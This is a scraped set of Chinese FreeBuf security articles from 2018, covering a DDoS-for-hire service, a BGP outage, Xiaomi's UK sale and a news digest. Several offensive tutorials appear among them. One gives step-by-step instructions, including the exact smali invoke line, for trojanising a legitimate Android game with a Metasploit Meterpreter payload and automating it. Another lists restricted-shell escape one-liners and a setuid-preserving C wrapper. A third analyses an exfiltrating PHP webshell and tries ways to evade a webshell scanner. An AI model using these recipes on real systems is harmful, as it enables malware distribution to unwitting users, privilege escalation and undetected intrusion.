根据Fortinet发布的安全分析报告:“在我们的常规监测过程中,FortiGuard实验室的研究人员发现了一个专门提供DDoS攻击服务的新型平台,这个平台就是“0x-booter”。该平台于2018年10月17日正式上线,任何一名在0x-booter网站上注册了的用户都可以使用该平台所提供的DDoS攻击服务。正如下图所示,这个服务提供了非常明确的用户界面,几乎任何人都可以通过简单的学习来使用该服务。”

专门提供DDoS攻击服务的新型平台

这个DDoS攻击服务由Bushido物联网僵尸网络驱动,当时Fortinet的专家认为这个服务的杀伤力并不大,不过在分析之后专家发现,该服务能够利用两万多个bot提供424.825 Gbps的攻击流量。

不管怎样,这样的攻击能力已经足以攻下大部分网站了。

攻下大部分网站

0x-booter允许用户发动不同的攻击,攻击主要针对的是传输层和应用层。

0x-booter的收费价格在$20到$150不等,具体取决于不同的攻击参数,其中包括攻击次数、攻击持续时间和用户的其他需求。

研究人员还发现了几份JSON文件,并披露了关于该服务的更多信息:

1、 typeattack.php:这个文件中包含了该服务所有可用的DDoS方法,以及相应的攻击价格。

2、 dateattack.php:这份文件包含了每一天里所有攻击方法的执行次数和日期。

根据第二份文件中的内容,该服务从10月17日开始,就已经执行了超过300次DDoS攻击了。

Bushido僵尸网络是由一个名叫ZullSec的组织运作的,这个僵尸网络最早是由MalwareMustDie的安全研究人员发现的,而这个公司也是最早发现Mirai僵尸网络的公司。

Bushido僵尸网络是基于Mirai僵尸网络开发出来的,但是Bushido在发动DDoS攻击这一方面有了很大服务的提升,并且还实现了更多自定义的攻击选项。

研究人员表示:“在对0x-booter网站和僵尸网络进行了分析之后,我们发现这个僵尸网络的代码是直接从Mirai的开源代码复制过来的,并且攻击者根据自己的需求对代码进行了二次开发。实际上,0x-booter网站是基于Ninjaboot搭建的,而Ninjaboot的源代码在去年的黑客论坛上早就已经泄漏出来了。即使Bushido僵尸网络有它自己的名字,但本质上来说它还是基于Mirai开发的。”

安全专家还指出,这个网站的威胁性还是比较大的,因为任何一个不懂僵尸网络的人,只需要花个几美金,就能够给其他网站带来非常严重的影响。

* 参考来源:securityaffairs,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

原文阅读

小米被质疑做虚假抢购,目的为了收集用户信息……
Karunesh91 2018-11-15 6:51 转存

最近一段时间,小米的日子恐怕不太好过,股价下跌、负面新闻不断,还没喘过气来,这边又出了个“火上浇油”的事。

近日,小米在英国市场做了一系列促销活动,推出“闪购活动”,销售其部分热门型号手机,价格仅为1英镑。以用来吸引英国消费者,开拓英国市场。活动推出即吸引了广泛的注意力。

然而在活动放出之后,非但没有达到预期的效果,反而引发了大量当地消费者的不满。据BBC报道,小米虽然推出了“1英镑抢购”的活动,但是却在活动中动了手脚:在活动上线后,用户点击抢购按钮直接会出现“售罄”字眼,整个活动实际上仅仅使用了几部手机参与。BBC表示原本的活动宣传中并未提及参与活动的手机只是如此小的数量。

微信图片_20181115143352.png

随后,便有人挖掘出了活动网站上的代码,发现在默认消息设置上直接显示手机已售罄,但实际上并没有进行库存检查。并且很多用户也在twitter上对小米此举进行了吐槽。

-7Q5-8ckdKoT1kShs-94 (1).jpg

微信图片_20181115142800.png原本,没有抢到活动手机就会对消费者心理造成一定的影响,在爆出后台程序做了手脚之后,英国消费者的不满更是达到了极点。

面对铺天盖地的声讨,小米官方随后也发布声明解释情况:

微信图片_20181115143556.png通过这个事件,也有人猜测,小米是否每次活动都会通过类似的方式,在后台操作程序,活动刚开始就售罄,给人造成销量火爆的现象,从而达到刺激消费的效果。这种情况是否真实我们也不得而知。

在英国消费者的情绪逐渐被安抚下来后,原本趋于平静的事件也有了新的转折:有人认为小米是通过活动来收集用户信息,虽然这种情况比较常见,但在欧洲却是非常严重的行为,随着GDPR的颁布,个人隐私的保护空前严格,Facebook就是前车之鉴。并且不久之前小米生态链旗下的Yeelight刚刚成为了GDPR的刀下鬼,因其违反规定而无法提供服务。

-7Q5-262uK1iT1kSf2-u4.jpg.medium.jpg虽然仅仅是一次促销拓展海外市场的活动,造成这样的结果,经由BBC的关注也使得事件有了一定的影响力,这样一个不太美好的开头对于未来要进军欧洲市场的其他中国企业会不会带来影响我们也不得而知。

*参考来源:163,Karunesh91编译,转载请注明来自FreeBuf.COM

原文阅读

如何在Android APK中植入Meterpreter
周大涛 2018-11-15 5:0 转存

写在前面的话

随着移动设备的快速发展,我们日常生活中的许多应用程序正在迁移到云部署,从JavaScript浏览器框架到支持移动设备的前端,例如Apple iOS上的Objective-C,或基于Android的Java。这也促进了手机应用的发展,与Apple不同,Android市场是一种开放的方式,允许任何人为商店做出贡献,而且占据了移动市场份额的大部分。

此外,还有各种第三方网站可以直接下载Android应用程序包文件(APK)。Metasploit允许测试人员使用meterpreter生成Android payload,并且可以安装到Android设备上。Android应用程序是用Java编写的,它编译成称为DEX的Dalvik可执行格式。应用程序的编译版本是DEX字节码文件的ZIP文件。

Android上的Dalvik虚拟机最近被Android RunTime(ART)取代,后者增加了优化并将DEX字节码编译为本地汇编代码。Dalvik VM主要执行大部分字节码的即时(JIT)解释。ART比Dalvik虚拟机具有更高的性能,Dalvik虚拟机仅优化应用程序的频繁执行部分的字节码部分。

Smali/baksmali是Android DEX字节码的汇编程序/反汇编程序。另一个名为“apktool” 的Android工具可以将压缩的DEX(APK文件)反汇编成smali文件,并将smali文件重新组合回DEX,然后再其重新组合为APK格式。我们可以使用此工具来反汇编和修改现有的APK文件。

接下来的文章中,我们可以使用该工具进行反汇编,并在初始Android Activity的smali代码中添加一个额外的静态入口点,以启动我们的Meterpreter。总的来说,将Meterpreter嵌入一个APK文件的步骤如下:

1.在“apkmonk.com”或类似的镜像站点上查找现有的有趣APK应用程序。

2.生成Metasploit APK文件。

3.用“apktool”反汇编Metasploit APK文件,以及我们打算修改的APK文件。

4.将所有Meterpreter smali代码复制到新的APK smali目录。

5.通过查找具有以下行的intent-filter,在APK应用程序的AndroidManifest.xml文件中找到代码的入口点  :<action android:name =“android.intent.action.MAIN”/>包含此intent-filter的活动名称将是您要搜索的入口点。

6.修改“.smali”文件以包含启动Meterpreter阶段的代码。

7.将Meterpreter AndroidManifest.xml中的所有Meterpreter权限复制到修改后的APK的AndroidManifest.xml中。

8.重新组装成DEX压缩格式。

9.使用“jarsigner”为新创建的APK文件签名,然后将其加载到目标Android设备上。接下来我会用一个具体的例子来解释下上述步骤,我从apkmonk.com下载了一个名为Cowboy Shooting Game的游戏的APK文件。 

1.png

生成恶意软件APK

然后,我使用“msfvenom”命令生成Metasploit APK,如下所示。

2.png

反汇编APK文件

然后使用“apktool” 对这两个文件进行反汇编,如下所示:

3.png

4.png

将恶意软件代码复制到游戏中

一个简单的方法是将目录更改为Metasploit APK目录,然后将“smali”目录下的所有文件复制到“com.CowboyShootingGames_2018-09-22”目录中。我从系统管理员那里学到的使用“tar”命令,你可以将tar的输出传输到第二个命令,该命令改变目录并“解压缩”生成的文件。

5.png

找到Activity EntryPoint

下面我们可以看到输入活动被列为“com.CowboyShootingGames.MainActivity”。我们知道这一点,因为XML中包含一个带有“android.intent.action.MAIN”的intent-filter。

6.png

修改Activity EntryPoint Smali文件

从上面可以看出,在这种情况下,文件将被命名为“MainActivity.smali”,并且完全限定类路径中的“com/CowboyShootingGames” directory as per the periods (“.”)目录中。

7.png

“MainActivity.smali”文件中,我们正在寻找“onCreate()”方法。

8.png

我们需要在“onCreate()”方法调用的正下方添加一行“smali”代码来调用我们的Meterpreter。invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V请注意,上面是一行代码。使用与“payload”目录中包含的所有“smali”文件中的所有路径引用都必须修改,并更改目录名称本身。这可以手工完成,但容易出错。继续没有任何混淆片刻,修改后的最终结果将像下面的截图一样。

9.png

向修改的APK“AndroidManifest.xml”文件添加权限

下一步,使用“grep”搜索Metasploit“AndroidManfest.xml”文件中包含字符串“uses-permission”和“uses-feature”到修改后的APK的AndroidManiest.xml文件中.

10.png

您需要使用编辑器在新的“AndroidManifest.xml”文件中的适当位置插入权限。搜索现有的“use-permission”行作为插入文本的位置的参考。

11.png

您最终可能会获得一些重复的权限。您可以选择删除它们,它没什么卵用。

构建新的APK包文件

现在 再次使用“apktool” 重新组合生成的APK包文件。最终结果将写入APK目录本身的“dist”目录中。12.png

重新签名生成的包文件

对于重新签名,一种简单的方法是使用安装Android studio时构建的Android调试密钥库。调试密钥库位于UN * X系统上主目录中的“.android”隐藏目录中。

13.png

另一种方法是使用Java“keytool”生成您自己的自签名密钥库,并使用“jarsigner”工具对其进行签名,如下面的截图所示。

14.png

15.png

此时,“final.apk”文件已准备好了,可以使用“adb”安装到Android系统上。

16.png

在演示中,我使用“GenyMotion”的虚拟机,这是一个基于x86的模拟器,它使用VirtualBox可以进行非常高性能的Android模拟。您可能会遇到的问题是x86仿真本身不支持ARM处理器。有一个解决方法,可以在线获得一些ARM翻译库。您需要搜索“ Genymotion-ARM-Translation_v1.1.zip ”,然后将ZIP文件拖到正在运行的GenyMotion Android系统上。这不是100%可靠,并且仍可能导致一些应用程序崩溃。我发现Nexus 6系列设备非常适合,因为“rooting”套件相当可靠,并且通过USB电缆连接进行测试并不是太麻烦。

17.png

最后一步当然是尝试我们新感染的游戏。我们很快发现,在我们安装完游戏的那一刻,我们在KALI系统上获得了一个Meterpreter shell。

18.png

19.png

那么问题来了,在执行了上述所有必要步骤后。我发现出错的可能性非常高。所以我决定使用Python脚本来自动执行此过程。我称它为“android_embedit.py”,无需花费太多精力,就可以完成工作。

20.png

“android_embedit.py”的原理是,只要您提供Metasploit生成的APK文件,和要修改的原始APK和密钥库,它将以自动方式执行所有步骤并为您生成结果。以下是运行该工具的示例。所有临时文件和输出都将存储在“〜/ .ae”目录中。

21.png

该工具还将删除“metasploit”目录名称,并自动使用随机字符串目录名称对其进行模糊处理。您可以在下面的截图中看到此结果,其中列出了APK“smali / com”目录的内容。名为“ dbarpubw ”的目录实际上包含Metasploitstager代码。

22.png

我想你现在可能想玩了吧,你可以通过问https://github.com/yoda66/AndroidEmbedIT从我的github下载  

*参考来源blackhillsinfosec,由周大涛编译,转载请注明来自FreeBuf.COM

原文阅读

谷歌网络服务宕机,中国电信背锅
Freddy 2018-11-15 2:30 转存

前言

上周日,谷歌旗下的云服务、YouTube等网络服务在全球范围内均发生了数小时的宕机,外媒称因遭到来自中国电信IP的BGP劫持导致故障发生。虽然这次事件为中国电信带来了“宝贵”的谷歌流量,但是黑锅我们真的不背。

中国电信

概述

本次事件是由一家名为Main One的西非电信公司进行网络更新引发的。Main One是位于尼日利亚拉各斯的一家商业ISP供应商,在葡萄牙和南非之间运营着一条海底电缆。

该公司表示:

由于更新时采用了错误配置,导致Google的流量被重定向至中国电信,持续时间长达74分钟。在这期间,全球范围内的用户再尝试连接Google、YouTube、Spotify和Nest等网络服务时,流量会通过一个名为TransTelekom的俄罗斯ISP供应商重定向至中国电信,中国电信无法解析这些莫名其妙的流量和请求,因此导致宕机事件。

解构

Main One提供了一些具体的细节。他们在进行网络更新时,由于误操作导致BGP过滤器配置错误,将一部分原来只属于某个网段的线路配置加入了另一个网段中,致其骨干网将针对Google服务的请求经过层层节点全部定向至中国电信IP。

为什么一家西非ISP供应商的失误会影响到北半球的美国?

主要原因是Main One通过位于尼日利亚拉哥斯的IXPN公司与谷歌存建立了点对点流量共享和交换协议,当Main One导入了错误的配置信息时,相关路由信息也会被谷歌自动获取和投入使用,谷歌的全网流量会通过TransTelecom传输到NTT和其他中转ISP,最后被重定向至中国电信。本次事件主要发生在商业级ISP链路上,消费级ISP链路几乎不受影响。谷歌也表示没有任何服务器或数据受到影响。

后话

这一事件进一步凸显了互联网架构的一个基础性弱点。BGP的设计初衷是为正常的商业ISP供应商和其他实体之间构建可以信任的网络链路,降低鉴别和过滤信息的复杂程度。而当今互联网服务提供商和国家之间的商业和地缘政治关系将BGP的薄弱点暴露了出来。虽然存在ROA等验证方法,但很少有ISP全面部署。

即使像谷歌这样拥有大量资源的公司也无法免受这种BGP故障的影响,大多数没有Google这么雄厚资源的企业可能无法快速定位和解决问题。

参考链接

https://www.theregister.co.uk/2018/11/14/nigerian_telco_bgp/

https://blog.thousandeyes.com/internet-vulnerability-takes-down-google/

*本文作者:Freddy,转载请注明来自FreeBuf.COM

原文阅读

Linux Restricted Shell绕过技巧总结
zusheng 2018-11-15 1:0 转存

*本文作者:zusheng,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

严正声明:本文涉及到的技术仅限于教育和讨论目的,严禁用于非法用途。

0×01 前言

如今网络安全行业越来越规范,我们还想直接获取到未限制的shell是件很困难的事情,系统运维人员一般都会给Linux shell加上一些限制来防止入侵,通常会阻止运行某些特定的命令。

0×01 什么是Restricted Shell

Restricted Shell既受限的shell,它与一般标准shell的区别在于会限制执行一些行为,比如:

使用 cd 来改变路径
设置或取消SHELL,PATH,ENV,或BASH_ENV变量的值
指定的命令名中包含/

如何设置一个Restricted Shell

我们可以先复制一个bash,然后设置某个用户登录后运行的shell:

cp /bin/bash  /bin/rbash
useradd -s /bin/rbash zusheng

然后允许不允许什么命令,就可以自行修改了。

0×02 枚举Linux环境

首先我们需要去检查Linux环境能做什么,这相当于一个收集情报的工作,这个步骤必不可少,有了情报才可以分析下一步骤该如何去做。

命令

检查可用的命令:

如cd、ls、echo等

检查可用的命令

操作符:

>
>>
<
|

root身份运行哪些命令:

sudo -l

检查shell

echo $SHELL
基本上都是/bin/rbash

编程语言

检查可用的编程语言,如python、perl、ruby等

编程语言

检查环境变量

运行env或者printenv

0×03 常见利用技术

“/”字符被允许

如果/被允许,我们可以直接运行:

常见利用技术

允许:

常见利用技术

cp命令被允许

如果cp命令被允许,我们可以直接复制/bin/bash到本用户目录:

cp命令被允许

允许:

cp命令被允许

常见应用

探测系统中是否存在常见应用,如FTP、GDB等

FTP:

ftp > !/bin/sh

GDB:

gdb > !/bin/sh

常见应用

man/git:

man > !/bin/sh
git > git help status

常见应用VIM

vim:

!/bin/sh 或者 !/bin/bash

VIM

允许情况下:

允许情况下

more/less

!'sh'

more/lessmore/less

set shell

在一些编辑器或命令中我们还以为设置shell变量然后执行,比如vim中:

set shellset shell

更改PATH或SHELL环境变量

输入命令

export -p

查看

查看

PATH和SHELL变量很可能是’-rx’,这意味着你只能执行不能写入,如果可写,你就可以直接写入/bin/bash。

编程语言

python:

python -c 'import os; os.system("/bin/bash")'

php:

php -a then exec("sh -i");

perl:

perl -e 'exec "/bin/sh";'

lua:

os.execute('/bin/sh').

ruby:

exec "/bin/sh"

最新技术

ssh:

ssh username@IP - t "/bin/sh" or "/bin/bash"

ssh2:

ssh username@IP -t "bash --noprofile"

ssh3:

ssh username@IP -t "() { :; }; /bin/bash" (shellshock)

ssh4:

ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)

ZIP:

zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

tar:

tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

awk:

awk 'BEGIN {system("/bin/bash")}'

scp:

 scp -S ./spellbash.sh 127.0.0.1:/tmp/z.zip ./

scp -S program: 指定加密传输时所使用的程序

我们这个spellbash.sh脚本功能就在于给shell加权限执行

shell代码如下:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
    setresgid(getegid(), getegid(), getegid());
    setresuid(geteuid(), geteuid(), geteuid());

    execve("/bin/bash", argv,  envp);
    return 0;
}

pico:

pico -s "/bin/bash"
然后输入/bin/bash按CTRL + T

0×04 实战操作

针对于Linux Restricted Shell绕过技巧基本上是介绍到了,接下来就是灵活运用的问题,我这里选择了一个挑战来运用一下文中的一些技术。

连接上机器,经过一番信息收集,我们发现只有vim可以利用一下:

实战操作

尝试

!/bin/bash
/bin/rbash: /bin/bash: restricted: cannot specify `/' in command names

继续尝试

set shell=/bin/bash
shell

可以发现我们成功绕过了rbash:

成功绕过了rbash

随后我们发现当前用户没有打开目标文件的权限,sudo -l查看一下能运行哪些命令

(app-script-ch14-2) NOPASSWD: /usr/bin/python

我们以app-script-ch14-2运行python,思路上面也提到了,可以利用python运行bash

/usr/bin/sudo -u app-script-ch14-2 /usr/bin/python -c 'import os; os.system("/bin/bash")'

继续sudo -l:

继续sudo -l

tar上面也总结过了:

tar上面也总结过了

接下来套路基本上一样不再演示了。

0×05 总结

正如我们所看到的,总有一种办法来绕过受限制的shell,这里我介绍了常见的例子,但是安全技术的可能性是无穷无尽,希望更多人能分享一下技巧,最后感谢分享技术的黑客、安全研究人员,没有他们的分享就没有这篇文章。

*本文作者:zusheng,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

原文阅读

Microsoft SQL Server漏洞浅析
千里目安全实验室 2018-11-15 0:30 转存

前言

Microsoft SQL Server 是微软公司推出的关系型数据库管理系统,因其具有使用方便与可伸缩性好,且与相关软件集成程度高等优点,从而被广泛使用。Microsoft SQL Server 数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,可以构建和管理对高可用和高性能有需求的业务业务场景。

0×01 Microsoft SQL Server数据库简介

目前Microsoft SQL Server数据库在全球的应用量也比较靠前,据统计,在全球范围内对互联网开放Microsoft SQL Server数据库服务的资产数量多达237,065台,发现中国地区对外开放的Microsoft SQL Server数据库服务数量排名第一,数量为75793台,接近全球总量的30%。排名第二与第三的分别是美国与荷兰地区,其对外开放的Microsoft SQL Server数据库服务数量分别为35,965台和33,664台。由此看来,国内使用Microsoft SQL Server数据库的用户很广泛,对Microsoft SQL Server数据库的漏洞防范就显得尤为重要了。

Microsoft SQL Server数据库

(统计数据仅为对互联网开放的资产,本数据来源于FOFA )

0×02 Microsoft SQL Server漏洞概述

近几年Microsoft SQL Server数据库爆发的漏洞数量与其它类型数据库相比,所暴露出来的漏洞相对较少。在此,挑选两个可利用性高,且具有代表性的漏洞进行分析,分析列表如下:

漏洞名称 漏洞类型 风险级别 CVE编号
Microsoft SQL Server sp_replwritetovarbin远程堆溢出漏洞 缓冲区溢出 CVE-2008-5416
Lyris ListManager MSDE SA弱密码漏洞 弱密码 CVE-2005-4145

0×03 Microsoft SQL Server漏洞分析

一、CVE-2008-5416漏洞分析

1、漏洞信息:

漏洞名称:Microsoft SQL Server sp_replwritetovarbin Stored Procedure Buffer Overflow Vulnerability

漏洞编号: CVE-2008-5416

漏洞类型: Buffer Overflow Vulnerability

2、漏洞概述:

Microsoft SQL Server是一款流行的SQL数据库系统。Microsoft SQL Server的sp_replwritetovarbin扩展存储过程中存在堆溢出漏洞,如果远程攻击者在参数中提供了未初始化变量的话,就可以触发这个溢出,向可控的位置写入内存,导致已有漏洞SQL Server进程的权限执行任意代码。在默认的配置中,任何用户都可以访问sp_replwritetovarbin过程。通过认证的用户可以通过直接的数据库连接或SQL注入来利用这个漏洞。

3、漏洞影响:

Microsoft SQL Server 受CVE-2008-5416漏洞影响的版本如下:

Microsoft SQL Server漏洞分析

4、漏洞分析:

1)CVE-2008-5416漏洞PoC利用代码分析:

我们从互联网中找到了CVE-2008-5416漏洞PoC,如下是漏洞PoC利用代码片段:

Microsoft SQL Server漏洞分析

通过PoC代码可以看出,先定义未初始化的自定义变量,然后传入超长数据段(数据段中可构造恶意攻击代码),通过sp_replwritetovarbin扩展在存储过程中进行堆溢出,将构造的攻击代码写入内存并执行。

2)CVE-2008-5416漏洞攻击流量分析:

攻击者TDS协议对靶机发起远程登陆认证请求,因为该漏洞只有远程认证成功后才可以进一步被利用。如下所示:

Microsoft SQL Server漏洞分析

当登陆请求认证成功后,进一步查询数据库服务器的版本信息。如下所示:

在确定数据库系统的版本信息后,再进一步选择对应的攻击PayLoad载荷,进行存储过程溢出攻击。如下所示:

5、漏洞验证:

通过Metasploit渗透测试框架对存在CVE-2008-5416漏洞的靶机进行测试,发现可以利用成功。如下图所示:

Microsoft SQL Server漏洞分析

6、漏洞修复建议:

Microsoft已经为此发布了一个安全公告(MS09-004)以及相应补丁。链接如下:

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2009/ms09-004

二、CVE-2005-4145漏洞分析:

1、漏洞信息:

漏洞名称:Lyris ListManager MSDE Weak SA Password Vulnerability

漏洞编号:CVE-2005-4145

漏洞类型:Weak Password Vulnerability

2、漏洞概述:

Lyris_technologies_inc Listmanager是Microsoft SQL ServerMSDE中的一款重要组件,由于Lyris_technologies_inc Listmanager5.0-8.9b版本中存在将数据库的SA帐户配置为使用具有小型搜索空间的密码的设计缺陷,导致攻击者可远程通过暴力破解攻击获取Microsoft SQL Server数据库的访问权。

3、漏洞影响:

Lyris_technologies_inc Listmanager受CVE-2005-4145漏洞影响的版本如下:

漏洞影响

4、漏洞分析:

1)漏洞PoC代码分析:

我们从互联网中找到了CVE-2005-4145漏洞PoC,如下是漏洞PoC利用代码片段:

漏洞分析

从上面的漏洞PoC代码可以看出,先尝试使用账号SA,密码lminstall进行尝试登陆,如成功,就执行下面的SQL利用代码,否则,进一步对SA账户进行进程PID暴力枚举来获取登陆权限,如登陆成功,同理,执行下面的SQL利用代码。

2)CVE-2005-4145漏洞PoC数据包分析:

攻击者通过TDS协议对靶机不停的发起远程登陆认证请求,用户名为SA,不停的枚举密码。

CVE-2005-4145漏洞PoC数据包分析

5、漏洞验证:

通过Metasploit渗透测试框架对存在CVE-2005-4145漏洞的靶机进行测试,发现可以利用成功。如下图所示:

漏洞验证

技巧提示:CVE-2005-4145漏洞PoC通过默认账号或指定账号的方式来进行枚举测试,由于代码实现比较简单,也比较鸡肋。我们可自行通过Hydra等工具枚举成功后,再将枚举成功的值填写Password字段中,然后进一步快速深度利用。

6、漏洞修复建议:

目前,官方已经在Lyris_technologies_inc Listmanager 8.9b版本修复了此漏洞,可自行升级到8.9b及以上版本。

0×04 结语

通过对Microsoft SQL Server进行一些列的梳理和分析,可以从以下几个维度进行归纳和总结:

1、高危漏洞主要分布在:Microsoft SQL Server7、Microsoft SQL Server2000、Microsoft SQL Server2005这三个版本。

2、影响范围比较广的漏洞类型有:缓冲区溢出漏洞、弱密码、权限提升、拒绝服务等四种。

3、Microsoft SQL Server高危漏洞的触发条件比较苛刻,基本上都需要先通过账号进行登陆才能进一步利用。

4、Microsoft SQL Server类漏洞比较集中爆发的时期是1997年至2005年这8年。随着微软对安全性越来越重视,在随后发布的Microsoft SQL Server2008及之后版本中存在的高危安全性问题越来越少。

*本文作者:千里目安全实验室,转载请注明来自FreeBuf.COM

原文阅读

一次编码WebShell bypass D盾的分析尝试
si1ence 2018-11-15 0:0 转存

*本文作者:si1ence,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

前言

webshell是获得网站的控制权后方便进行之后的入侵行为的重要工具,一个好的webshell应该具备较好的隐蔽性能绕过检测,最近偶然间捕获到了一个webshell的样本经过了4次编码来绕过检测感觉功能还挺强大的,于是就简单分析一下然后再简单的优化了一下发现更nice。

0×1 功能

本地访问了一下主要功能也就3个主要包括读取系统信息与当前用户、命令执行和文件上传,感觉还是常规的操作访问界面如下:

操作访问界面

主要代码如下:

主要代码

0×2 解码

主要是用了eval函数配合base64进行简单的绕过,base_decode函数进行了简单的大小写混淆都是很常规的操作。

对base64编码的字符串进行解码后得到如下字符串,得到如下字符串又是一串代码。

解码

出于直觉对base64的字符串再一次进行解码,得到一串乱码,看来也不是这么容易。

进行解码

关键点定位在了str_rot13 和gzinflate二个函数上面,就顺便查了一下这二个函数的用途,都是属于一种编码类感觉这操作很nice。

二个函数的用途

二个函数的用途

然后通过修改一下webshell的内容,将解码后的源码就直接输出了,算了一个2次base64、1次str_rot13、1次gzinflate就4次编码了,这个几个编码都是标准库里的函数。

解码后的代码一共只有60+行,短小精悍。

只有60+行

0×3 详细代码

感觉还是很6的操作,先收集了网站系统的信息IP、路径、权限一类的数据通过邮件的方式先发送到了已经设定好的邮箱setoran.target26@gmail.com,这个操作不错。

同时检测本的一个bajak的session值,确保邮件不会重复发送。

检测本的一个bajak的session值

在本地创建一个副本放在指定的目录下 images/stories/food/footer.php:

在本地创建一个副本

后续就是一个命令执行和文件上传的操作,还有一个读取配置的文件的代码上二级目录的configuration.php,说实话并不是很理解。

执行和文件上传的操作

0×4 监测

简单抓包看了一下流量层面执行了一个ipconfig,没有捕获到比较有用的信息,命令主要是以cmd的参数进行传递。

以cmd的参数进行传递

感觉操作很牛逼的webshell,应该不会被查杀出来的,毕竟解码还是比较复杂的。

然后用D盾进行查杀,报警提示为4级,这好不科学只有给Orz了。看看提示的是什么,主要依据是eval函数跟了一个base64的字符串,总觉得有什么不对,按理说不应该D盾应该是没有解码的!!!迷之自信!!

按照这个猜想,我自己创建了一个hello world的字符,按照通用的方式进行编码,然后使用D盾进行查杀,果然查杀出来了!!!

查杀出来了

查杀出来了

2个文件、2个可疑。D盾的确是通过这二个特征进行识别的,主要特征就是如下,那想想办法绕过呢。

想办法绕过

首先测试一下注释绕过base64的检测,的确成功绕过了base64的特征,但是仍然识别出了eval的后门还是4级有点upset了。

成功绕过了base64

既然是这样的话,那就再换一种方式。

用函数的方法输出eval居然成功了,级别直接就降低到了2级!!!

降低到了2级

0×5 总结

1. 问题到底是还出在eval这个函数,后面陆陆续续尝试了字符串拼接、大小写混淆、逆序等方式居然都没有绕过。最近又要忙着搬砖就没有继续深入下去了,欢迎各位大佬们尝试顺便给点思路指点一二。

2. 通过一些编码和变化去绕过检测规则对于技术的总结提高还是很有帮助的,日常还是需要多练习尝试。

3. 上次偶然间看到有一些通过特征提取使用朴素贝叶斯做机器学习检测webshell的,攻防对抗越来越有意思以后的绕过技巧也许会更加丰富。

4. 用别人的的过狗大马小马一句话的时候,也要多留心别人留一个后门瞬间就尴尬了。

*本文作者:si1ence,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

原文阅读

BUF早餐铺 | 微软发布11月安全更新;谷歌发布全球首份安卓生态安全报告;10万僵尸网络滥用家用路由器发送垃圾邮件
AngelaY 2018-11-14 23:0 转存

各位Buffer早上好,今天是2018年11月15日星期四,农历十月初八。今天的早餐铺内容有:微软发布2018 年 11 月安全更新;谷歌发布全球首份安卓生态安全报告:系统越新越安全 ;研究人员报告 7 种新的预测执行攻击;欧洲刑警组织:2018年勒索软件仍是最大的恶意软件威胁;双11网购安全报告:仿冒购物App激增,类似钓鱼网站。

pusryciai.jpg以下请看详细内容:

微软发布2018 年 11 月安全更新

TIM截图20181115010442.png

本周二,微软发布了 11 月份的安全补丁,共修复 62 个安全漏洞。其中有13个漏洞被标记为关键漏洞。此次更新修复了众多已经出现在野攻击利用的漏洞。此次更新涉及到的产品主要是浏览器的脚本引擎和Office,以及可能被黑客用于提权的 10 月份更新补丁中的漏洞。此外,微软还发布了一个安全通告,详细指导用户如何正确配置固态硬盘的BitLocker。主要是为了应对前日曝出的影响大量硬盘的加密绕过漏洞。同时也提醒用户,在及时更新的同时,也要提前做好数据备份。[来源:zdnet]

谷歌发布全球首份安卓生态安全报告:系统越新越安全 

近日,谷歌公布了史上首份安卓生态系统报告(Android Ecosystem Security Transparency Report),这份报告属于季报,谷歌对检测到的“可能存在危险的应用程序”(以下简称PHA)进行统计,内容显示谷歌官方商店中下载的应用比其他渠道安全9倍。根据谷歌统计的数据,从谷歌商店中下载的应用,有0.09%的应用会被识别为PHA,较前三季度下降0.08%。而通过其他市场或平台安装的应用中,有0.82%会被识别为PHA。另外,安卓系统版本越新,受到的PHA安全越低,这里安卓5.0受到的PHA威胁最高为0.66%。而最新的安卓9.0受到PHA威胁仅为0.06%。除了谷歌Play商店未进入的国家和地区,印尼和印度受到PHA威胁最高,另外几个国家分别是美国、俄罗斯、日本、墨西哥、巴西、德国、土耳其、韩国。[来源: google]

研究人员报告 7 种新的预测执行攻击

在 Meltdown、Spectre 、 Foreshadow 和 BranchScope 之后,研究人员报告了七种新的预测执行攻击,部分攻击能比现有的缓解技术缓解,其余则需要新的技术,为了保护存在漏洞的系统未来需要更多工作要做。 研究人员报告了一种新的 Meltdown 攻击变种,利用了英特尔的 Protection Keys for Userspace(PKU),另一个攻击利用了英特尔的 Memory Protection eXtensions (MPX),两种攻击都利用无效访问让处理器的预测执行功能泄漏敏感信息。另外五种攻击其中四种是分支预测。这些攻击除了对英特尔处理器有效外,还影响到 AMD 处理器和 ARM 处理器。[来源:Solidot]

欧洲刑警组织:2018年勒索软件仍是最大的恶意软件威胁

据欧洲刑警组织(Europol) 2018年版的“互联网有组织犯罪威胁评估(IOCTA)”(internetorganized Threat Assessment,简称IOCTA)报告,在大多数欧盟成员国,勒索软件仍是最主要的恶意软件威胁,而加密攻击正变得越来越普遍。欧洲刑警组织发现,,勒索软件的威胁就像其他恶意软件一样,一旦恶意软件工具变得更容易获取,变得越来越复杂和强大,攻击就会慢慢转移到商业领域,为威胁行为者提供更高的报酬。此外,由于密码攻击所需的资源要少得多,所投入的工作量也会带来更高的回报,威胁行为者越来越多地使用它来利用受害者的处理能力来挖掘加密货币。[来源: europol]

双11网购安全报告:仿冒购物App激增 类似钓鱼网站

针对刚刚过去的“双十一”购物节,北京市公安局网络安全保卫总队猎网平台发布《网购安全生态报告》。报告显示:假冒购物软件和专业电商购物平台成为网络黑客的新目标。报告显示:早在“双十一”到来之前的一个多月,各类仿冒购物App应用的数量激增,数量近4000个,其中手机淘宝、拼多多、天猫、京东、美团、唯品会等购物平台进入了被仿冒名单的前十名。这些虚假购物应用软件与钓鱼网站危害类似,黑客可以盗取用户账户信息,造成财产损失。 另外,今年双十一期间,各类专业电商平台和应用软件,也就是所谓的垂直电商,成为各类网购高危漏洞的重灾区。报告显示:在500多个购物类应用软件中,近九成的购物应用软件存在高危漏洞。其中主流综合商城类购物软件占比为5.3%,整体数量不多,但各类专业垂直电商则成为重灾区,有三成多的应用软件存在高危漏洞。[来源: 腾讯科技]

*AngelaY编译整理,转载请注明来自FreeBuf.COM

原文阅读

